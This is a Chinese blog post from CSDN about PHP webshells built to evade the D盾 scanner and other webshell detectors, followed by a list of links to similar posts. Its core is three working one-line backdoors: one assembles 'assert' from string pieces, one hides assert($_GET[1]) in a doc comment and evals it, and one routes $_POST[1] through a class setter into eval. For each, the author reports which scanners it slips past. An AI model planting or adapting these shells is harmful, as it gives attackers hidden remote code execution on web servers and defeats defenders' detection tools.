过D盾php webshell免杀马探讨

已于 2022-07-19 18:01:33 修改
阅读量1.6k 收藏 3
点赞数 1
分类专栏: 免杀 安全 文章标签: 安全 前端 javascript
于 2022-07-19 18:00:52 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33942040/article/details/125877740
版权

前言:

本文章仅用于渗透交流学习,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任

最近有在系统的总计waf绕过内容和后缀的绕过,把以前别的师傅发过的很多东西做了一些总结
在这个过程中发觉了其实webshell的bypass手法还是蛮多的
后缀bypass总结完了 经过实战也绕过了很多家最新的waf后缀
内容的还没写完 东西有点多
image.png
这里就分享一些php免杀的马 全过的也有贼多 但是暂时就不分享了

版本限制

使用条件:版本<7.1可用

这里发的是除了百度以外全过的(当然有全过的 但是暂时不会发出来)

马内容:
<?php

class get{
        public $x="";
        public $y="";
        public function setName($name=1){
                return $this -> name = $name;
        }
}
$obj = new get();
$s = $obj -> setName($name="ass");
$s = $s."ert";
$a = " $_POST[1]";
$b=null;
$s($b.$a);
?>
bypass情况:

最新版D盾
image.png
长亭
image.png

百度家的没过
image.png
在线的 这个不建议使用 效果就离普 其他都能查出的他不行
image.png
河马
image.png

版本未限制的

马1(这个只过了d盾 不太理解这个d盾为啥不查)

内容:

<?php  
    /**   
    * assert($_GET[1+0]);
    */  
    class User { }  
    $user = new ReflectionClass('User');
    $comment = $user->getDocComment();
    $d = substr($comment , 14 , 20);
    eval($d);
?>

image.png
d盾
image.png
长亭
image.png
百度
image.png

河马也不过
image.png

马2

马内容:

<?php
class get{
        public $x="";
        public $y="";
        
        public function setName($name=1){
                return $this -> name = $name;
        }
}
$obj = new get();
$s = $obj -> setName($name="$_POST[1]");
eval($s);

bypass情况:
除百度其他的都过了
image.png
d盾
image.png
长亭的
image.png
百度
image.png
河马
image.png

goddemon
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
攻防演练中PHP免杀大马分析实战_afei00123
afei001
07-10 917
在一次HVV行动中,在某天眼设备上发现红队在尝试通过命令执行下载了一个可疑的txt文件。该文件经分析是一个不错的免杀PHP大马
D盾查杀webshell使用教程_d盾webshell
最新发布
2401_84968529的博客
05-16 482
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
php超小免杀大马_PHP免杀大马的奇淫技巧
weixin_34150870的博客
02-28 2702
本文最后更新于可能会因为没有更新而失效。如已失效或需要修正,请留言!Part 1 Part 2大马后门检查: Fiddler 抓包 审计代码修改并运行脚本 Burp 抓包或者右键查看原代码 修改并运行代码 再使用 Burp 抓个包 查找关键字 GetHtml hmlogin localhost 等 把上图的 base64 代码解密下 Part 3大马源码免杀这里我使用的是国外的一款大...
php超小免杀大马_php大马免杀技巧 | bypass waf
weixin_39885166的博客
12-20 347
Part 1 前言Part 2 免杀执行代码eval 或 preg_replace的/e修饰符来执行大马代码。$a = 'phpinfo();';eval($a);//eval执行php代码编码如果直接去执行代码,是过不了waf的,我们一般需要将大马源码进行编码。eval_gzinflate_base64类型加密与解密:http://www.zhuisu.net/tool/phpencode.ph...
php webshell免杀初探_2024最新php免杀大马(1),2024年最新腾讯T2大牛手把手教你
2401_83973943的博客
04-13 528
长亭百川WebShell查杀引擎:通过webshell加载器进行绕过,实战中不知道是否可行。(可能要加入不死机制?本体.php加载器。
D盾-webshell检测必备工具
07-09
D盾的功能比较强大, 最常见使用方式包括如下功能:1、查杀webshell,隔离可疑文件;2、端口进程查看、base64解码以及克隆账号检测等辅助工具;3、文件监控。第一个是D盾的主要功能,后面功能是D盾的辅助功能,但是...
2016最新php免杀webshell安全
03-05
【标题】"2016最新php免杀webshell安全狗" 描述了这个压缩包文件中的PHP脚本能够避开安全狗等Web安全防护软件的检测,从而在2016年时被认为是可以成功上传并执行的WebshellWebshell通常是指攻击者通过SQL注入、...
webshell-venom-master一些免杀
04-13
Webshell Venom Master中的免杀是指设计时考虑了这些技术,以提高其在目标环境中的生存能力。 3. **编程语言**:Webshell Venom Master包含了多种编程语言的Webshell示例,如PHP、Python、ASP、JSP等。每种语言都...
PHP免杀的浅谈[过最新D盾]1
08-03
这篇文章主要探讨的是如何在PHP环境中创建“小”(webshell)并使其免于被安全软件如D盾检测。PHP通常是指一种恶意代码,允许攻击者远程控制被入侵的服务器,执行任意PHP命令。文章中提到了两种绕过D盾检测的...
PHP常见过waf webshell以及最简单的检测方法
10-16
主要给大家介绍了关于PHP常见过waf webshell以及最简单的检测方法,文中通过示例代码介绍的非常详细,对大家学习或者使用PHP具有一定的参考学习价值,需要的朋友们下面来一起学习学习吧
php一句话木免杀
qq_58683895的博客
11-21 1624
利用php动态函数的特性,将危险函数拆分成字符,最终使用字符串拼接的方式,然后重新拼接,后加括号执行代码,并且可以使用花指令进行包装,如无限if(1=1)套接,以此来做伪装绕过,达成免杀
PHP大马】定义、下载、使用、源码
热门推荐
06-01 2万+
PHP大马】适合第一次接触的
Php309,GitHub - xiaoq190309/S9MF-php-webshell-bypass: 为方便WAF入库的项目 | 分享PHP免杀大马 | 菜是原罪 | 多姿势(假的就一个)...
weixin_30999669的博客
03-22 446
S9MF-php-webshell-bypass为方便WAF入库的项目 | 分享PHP免杀大马 | 菜是原罪 | 多姿势(假的就一个)前言webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。又分大马和小大马就是功能比较多的,而小更像一句话,本文介绍的是免杀PHP大马。声明项目脚本仅供学习交流请勿用于非法用途。本文测试的免杀...
浅谈PHP大马免杀之如何过狗过宝塔过阿里云D盾
iphp666的博客
09-17 2870
PHP免杀方法有很多,加密混淆字符转换拆分等等都可以达到目的,下面来简单介绍几种免杀PHP大马的方法,一句话思路也是一样 拿我很喜欢的一款php大马来示范,这个支持cmd命令,编辑文件不会空白,界面非常经典,最重要的是支持php7,高音甜中音准低音沉,总之一句话,就是通透! <?php $password='haha';//登录密码 //----------功能程序-----------...
冰蝎php静态免杀
qq_61807674的博客
04-02 1217
其实还有小哥的腾讯哈勃,但是那个不支持上传webshell,上传压缩包虽然行,但是如果压缩一遍了连冰蝎原都查杀不出来,就当图一乐了,就不放出来了.....大部分云沙箱和在线查杀我都基本试过了,基本除了安恒云沙箱都能稳过(ah一生之敌),因为我的测试环境是php7.3往上了,没法用assert拼接执行,估计是检测到了eval执行字符串代码,所以静态检测没过,太丢脸就不放截图啦,师傅们可以按着自己的想法改改试试()但是也正常,只是做了基础的静态免杀而已,其实处理还是不够到位的,心态要端正,很不错了!
PythonPHP异或免杀制作以及使用编码器和解码器绕过宝塔实现webshell控制
qq_61616350的博客
12-21 1154
我们先用$a接收加密 create_function后的结果,$a = ('3'^'P').(')'^'[').(')'^'L').(')'^'H').(')'^']').(')'^'L').(')'^'v').(')'^'O').(')'^'\\').(')'^'G').(')'^'J').(')'^']').(')'^'@').(')'^'F').(')'^'G');不知道为什么我的ASSERT()函数使用蚁剑连接不上,所以我就用了自定义函数的方法来制作木。我上传的shell也被宝塔拦截了。
php超小免杀大马_超小PHP小结(方便查找后门的朋友)免杀
weixin_39579483的博客
12-30 846
作者: spider我也来个超小PHP复制代码 代码如下:header("content-Type: text/html; charset=gb2312");if(get_magic_quotes_gpc()) foreach($_POST as $k=>$v) $_POST[$k] = stripslashes($v);?>保存文件名: if(isset($_POST['file...
PHP免杀方法
wutiangui的博客
06-07 850
/ 函数变形 assert 达到免杀(免除杀毒软件识别)的效果:如。//将eval变形为evee。函数从字符串的两端删除空白字符和其他预定义字符。函数把字符串中每个单词的首字符转换为大写。函数把字符串的一部分替换为另一个字符串。函数把字符串中的首字符转换为大写。函数把字符串分割为更小的字符串。函数转换字符串中特定的字符。函数返回字符串的一部分。函数把字符串转换为大写。函数把字符串转换为小写。
PHP Webshell检测绕过技术探索
2. **D盾Web查杀**:提供Webshell在线检测服务。 3. **深信服WebShellKillerTool**:由深信服公司开发的Webshell检测工具。 4. **BugScaner killwebshell**:BugScaner的Webshell检测模块。 5. **河专业版查杀...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

goddemon

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值